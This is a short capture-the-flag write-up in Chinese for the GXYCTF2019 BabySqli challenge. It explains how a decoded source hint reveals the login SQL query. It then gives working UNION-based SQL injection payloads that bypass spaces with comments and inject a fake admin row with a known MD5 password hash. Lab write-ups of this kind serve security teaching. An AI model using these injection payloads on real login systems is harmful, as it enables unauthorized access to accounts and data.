GXYCTF2019-BabySqli-wp

源码

查看页面源码看到字符串 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

base32+base64解密后得到 select * from user where username = '$name'

分析

登录 用户名只能为admin 发现name字段可以替换空格注入 但信息无回显

可以联合注入3个字段 经尝试发现第二个字段为用户名 使其为admin即可

尝试密码传数组得到warning:Warning: md5() expects parameter 1 to be string, array given in /var/www/html/search.php on line 27

猜测判断逻辑应该为 将数据库中取出的password和md5($pw)比较

exp

1
name=admin'/**/union/**/select/**/1,'admin',NULL/**/limit/**/1,1%23&pw[]=1

1
2
name=admin'/**/union/**/select/**/1,'admin','0cc175b9c0f1b6a831c399e269772661'/**/limit/**/1,1%23&pw=a
// 0cc175b9c0f1b6a831c399e269772661 == md5('a')
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP